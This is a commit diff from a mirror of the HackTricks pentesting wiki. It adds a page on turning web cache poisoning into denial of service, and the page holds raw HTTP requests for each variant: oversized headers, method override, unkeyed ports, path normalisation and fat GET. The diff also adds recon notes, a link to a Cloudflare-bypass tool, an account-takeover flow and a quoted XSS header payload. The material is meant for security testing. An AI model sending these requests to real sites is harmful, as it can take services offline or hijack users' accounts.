Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4306: No subject

Browse source
This commit is contained in:
CPol 2024-04-10 13:29:30 +00:00 committed by gitbook-bot
parent 91a2189fb2
commit 2572c94842
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
8 changed files with 255 additions and 22 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
SUMMARY.md
View file

@ -526,7 +526,8 @@
* [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
* [Captcha Bypass](pentesting-web/captcha-bypass.md)
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception.md)
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception/README.md)
* [Cache Poisoning to DoS](pentesting-web/cache-deception/cache-poisoning-to-dos.md)
* [Clickjacking](pentesting-web/clickjacking.md)
* [Client Side Template Injection (CSTI)](pentesting-web/client-side-template-injection-csti.md)
* [Client Side Path Traversal](pentesting-web/client-side-path-traversal.md)

8
generic-methodologies-and-resources/external-recon-methodology/README.md
View file

@ -185,6 +185,10 @@ It's common to have a cron job such as
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
### Mail DMARC information
You can use a web such as [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) or a tool such as [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) to find **domains and subdomain sharing the same dmarc information**.
### **Passive Takeover**
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
@ -223,6 +227,10 @@ _Note that sometimes the domain is hosted inside an IP that is not controlled by
It's time to find all the possible subdomains of each found domain.
{% hint style="success" %}
Note that some of the tools and techniques to find domains can also help to find subdomains!
{% endhint %}
### **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).

4
network-services-pentesting/pentesting-web/special-http-headers.md
View file

@ -75,8 +75,8 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
* **`Age`** defines the times in seconds the object has been in the proxy cache.
* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
{% content-ref url="../../pentesting-web/cache-deception.md" %}
[cache-deception.md](../../pentesting-web/cache-deception.md)
{% content-ref url="../../pentesting-web/cache-deception/" %}
[cache-deception](../../pentesting-web/cache-deception/)
{% endcontent-ref %}
**Local Cache headers**:

10
network-services-pentesting/pentesting-web/uncovering-cloudflare.md
View file

@ -49,7 +49,7 @@ for ir in `curl https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixe
done
```
## Uncovering Cloudflare from Cloud machines
## Uncovering Cloudflare from Cloud infrastructure
Note that even if this was done for AWS machines, it could be done for any other cloud provider.
@ -80,7 +80,7 @@ This mechanism relies on **client** [**SSL certificates**](https://socradar.io/h
Instead of configuring it's own certificate, customers can simple use Cloudflares certificate to allow any connection from Cloudflare, **regardless of the tenant**.
{% hint style="danger" %}
Therefore, an attacker could just set a **domain in Cloudflare using CLoudflares certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
Therefore, an attacker could just set a **domain in Cloudflare using Cloudflare's certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
{% endhint %}
More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
@ -100,6 +100,12 @@ Sometimes you just want to bypass Cloudflare to only scrape the web page. There
* Use Google cache: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
* Use other cache services such as [https://archive.org/web/](https://archive.org/web/)
### Tools
Some tools like the following ones can bypass (or were able to bypass) Cloudflare's protection against scraping:
* [https://github.com/sarperavci/CloudflareBypassForScraping](https://github.com/sarperavci/CloudflareBypassForScraping)
### Cloudflare Solvers
There have been a number of Cloudflare solvers developed:

21
pentesting-web/account-takeover.md
View file

@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
@ -38,7 +38,6 @@ Should the target system allow the **reset link to be reused**, efforts should b
2. One should wait until the victim signs up using OAuth and confirms the account.
3. It is hoped that the regular signup will be confirmed, allowing access to the victim's account.
## **CORS Misconfiguration to Account Takeover**
If the page contains **CORS missconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose:
@ -97,16 +96,26 @@ If the authentication response could be **reduced to a simple boolean just try t
## Response Manipulation
1. **Code Manipulation**: The status code is altered to `200 OK`.
2. **Code and Body Manipulation**:
- The status code is changed to `200 OK`.
- The response body is modified to `{"success":true}` or an empty object `{}`.
2. **Code and Body Manipulation**:
* The status code is changed to `200 OK`.
* The response body is modified to `{"success":true}` or an empty object `{}`.
These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.
## Change email of current session
From [this report](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea):
* Attacker requests to change his email with a new one
* Attacker receives a link to confirm the change of the email
* Attacker send the victim the link so he clicks it
* The victims email is changed to the one indicated by the attacker
* The attack can recover the password and take over the account
## References
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
* [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
<details>
@ -117,7 +126,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

57
pentesting-web/cache-deception.md → pentesting-web/cache-deception/README.md
View file

@ -14,7 +14,7 @@ Other ways to support HackTricks:
</details>
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@ -41,13 +41,19 @@ The execution of a cache poisoning assault involves several steps:
### Discovery: Check HTTP headers
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
### Discovery: Caching 400 code
### Discovery: Caching error codes&#x20;
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).\
A badly configured header could be just `\:` as a header.\
_Note that sometimes these kinds of status codes aren't cached so this test will be useless._
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).
You can find more options in:
{% content-ref url="cache-poisoning-to-dos.md" %}
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
{% endcontent-ref %}
However, note that **sometimes these kinds of status codes aren't cached** so this test could not be reliable.
### Discovery: Identify and evaluate unkeyed inputs
@ -86,6 +92,12 @@ X-Forwarded-Host: a."><script>alert(1)</script>"
_Note that this will poison a request to `/en?region=uk` not to `/en`_
### Cache poisoning to DoS
{% content-ref url="cache-poisoning-to-dos.md" %}
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
{% endcontent-ref %}
### Using web cache poisoning to exploit cookie-handling vulnerabilities
Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
@ -124,9 +136,30 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
```
### Fat Get
Send a GET request with the request in the URL and in the body. If the web server uses the one from the body but the cache server caches the one from the URL, anyone accessing that URL will actually use the parameter from the body. Like the vuln James Kettle found at the Github website:
```
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
report=innocent-victim
```
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### Parameter Cloacking
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
### Automated testing for Web Cache Poisoning
@ -134,7 +167,9 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
Example usage: `wcvs -u example.com`
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@ -142,6 +177,8 @@ Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Vulnerable Examples
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
@ -201,7 +238,7 @@ Then, the **attacker** can access _http://www.example.com/home.php/non-existent.
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
## Automatic Tools
@ -216,7 +253,7 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

172
pentesting-web/cache-deception/cache-poisoning-to-dos.md Normal file
View file

@ -0,0 +1,172 @@
# Cache Poisoning to DoS
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% hint style="danger" %}
In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**
{% endhint %}
* **HTTP Header Oversize (HHO)**
Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:
```
GET / HTTP/1.1
Host: redacted.com
X-Oversize-Hedear:Big-Value-000000000000000
```
* **HTTP Meta Character (HMC) & Unexpected values**
Send a header that contain some **harmfull meta characters** such as `\n` and `\r`. In order the attack to work you must bypass the cache first.
```
GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r
```
A badly configured header could be just `\:` as a header.
This could also work if unexpected values are sent, like an unexpected Content-Type:
```
GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld
```
* **Unkeyed header**
Some websites will return an error status code if they **see some specific headers i**n the request like with the _X-Amz-Website-Location-Redirect: someThing_ header:
```
GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing
HTTP/2 403 Forbidden
Cache: hit
Invalid Header
```
* **HTTP Method Override Attack (HMO)**
If the server supports changing the HTTP method with headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`. It's possible to request a valid page changing the method so the server doesn't supports it so a bad response gets cached:
```
GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST
```
* **Unkeyed Port**
If port in the Host header is reflected in the response and not included in the cache key, it's possible to redirect it to an unused port:
```
GET /index.html HTTP/1.1
Host: redacted.com:1
HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss
```
* **Long Redirect DoS**
Like in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:
```
GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit
GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss
```
* **Host header case normalization**
The host header should be case insensitive but some websites expect it to be lowercase returning an error if it's not:
```
GET /img.png HTTP/1.1
Host: Cdn.redacted.com
HTTP/1.1 404 Not Found
Cache:miss
Not Found
```
* **Path normalization**
Some pages will return error codes sending data URLencode in the path, however, the cache server with URLdecode the path and store the response for the URLdecoded path:
```
GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com
HTTP/1.1 404 Not Found
Cach:miss
Not Found
```
* **Fat Get**
Some cache servers, like Cloudflare, or web servers, stops GET requests with a body, so this oucld be abused to cache a invalid response:
```
GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3
xyz
HTTP/2 403 Forbidden
Cache: hit
```
## References
* [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
* [https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

2
pentesting-web/web-vulnerabilities-methodology.md
View file

@ -23,7 +23,7 @@ Nowadays **web** **applications** usually **uses** some kind of **intermediary**
{% endhint %}
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception.md)
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
* [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
* [ ] [**H2C Smuggling**](h2c-smuggling.md)
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)